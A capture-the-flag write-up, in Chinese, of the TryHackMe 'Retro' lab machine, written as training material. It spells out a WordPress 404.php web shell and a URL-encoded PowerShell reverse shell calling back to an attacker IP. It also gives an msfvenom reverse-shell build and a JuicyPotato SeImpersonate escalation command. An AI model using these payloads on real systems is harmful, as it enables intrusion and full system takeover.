Retro on TryHackMe

, , ,

Before all

又是一台HARD
打ㄌ兩天才打下來的機器…
等等去弄專題owob

Victim’s IP : 10.10.233.57
Attacker’s IP : 10.9.195.189

Write Up

RECON

port scan

Command 

1
rustscan -a 10.10.233.57 --ulimit 5000 -- -sC -sV -Pn

Result
image
port 80是一個web服務,port 3389開了RDP

directory enumeration

這邊我使用了dirbuster這項工具,因為dirsearch什麼都打不出來(
image
使用/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt的文檔。
結果:
image
發現路徑/retro,是一個wordpress服務。
image
真的挺retro的。

Exploit

social engineering

發現管理員wade的奇怪留言:
image
推測是帳號密碼,以wade/parzival登入wordpress管理頁面成功
另外,因為有開啟RDP服務,也去使用xfreerdp以及剛剛獲得的帳號密碼進行登入。

rdp

利用剛剛拿到的帳號密碼登入成功。
Command 

1
xfreerdp /u:wade /p:parzival /v:10.10.233.57 /dynamic-resolution

Result
image
RDP成功,拿到user.txt

reverse shell

因為拿到了wordpress管理員權限,往404.php塞入shell
image
裝好後塞入reverseshell.com(link here)生成的powershell payload
url:http://10.10.233.57/retro/wp-content/themes/90s-retro/404.php?shark=powershell%20-nop%20-W%20hidden%20-noni%20-ep%20bypass%20-c%20"%24TCPClient%20%3D%20New-Object%20Net.Sockets.TCPClient('10.9.195.189'%2C%205427)%3B%24NetworkStream%20%3D%20%24TCPClient.GetStream()%3B%24StreamWriter%20%3D%20New-Object%20IO.StreamWriter(%24NetworkStream)%3Bfunction%20WriteToStream%20(%24String)%20%7B%5Bbyte%5B%5D%5D%24script%3ABuffer%20%3D%200..%24TCPClient.ReceiveBufferSize%20%7C%20%%20%7B0%7D%3B%24StreamWriter.Write(%24String%20%2B%20'SHELL>%20')%3B%24StreamWriter.Flush()%7DWriteToStream%20''%3Bwhile((%24BytesRead%20%3D%20%24NetworkStream.Read(%24Buffer%2C%200%2C%20%24Buffer.Length))%20-gt%200)%20%7B%24Command%20%3D%20(%5Btext.encoding%5D%3A%3AUTF8).GetString(%24Buffer%2C%200%2C%20%24BytesRead%20-%201)%3B%24Output%20%3D%20try%20%7BInvoke-Expression%20%24Command%202>%261%20%7C%20Out-String%7D%20catch%20%7B%24_%20%7C%20Out-String%7DWriteToStream%20(%24Output)%7D%24StreamWriter.Close()"
GET SHELL!!!
image

Privilege Escalation

利用 whoami /priv 查詢使用者權限

image
有開啟SeImpersonatePrivilege權限,合理推測能使用提權工具 Juicy Potato做下一步攻擊。
註:https://github.com/ohpe/juicy-potato/releases/tag/v0.1
利用msfvenom生成exe reverse shell
Command 

1
msfvenom -p windows/x64/shell_reverse_tcp lhost=10.9.195.189 lport=1004 -f exe -o ./x64winreverse.exe

透過剛剛的reverse shell在機器上安裝JuicyPotato.exe以及x64winreverse.exe
接著查詢對應的CLSID並一一嘗試:
(CLSID表:https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2016_Standard)
Command 

1
./JuicyPotato.exe -t * -l 1004  -p x64winreverse.exe -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}"

Result
image
成功在監聽端口得到回應!!!

After all

第一次玩JuicyPotato,有趣XD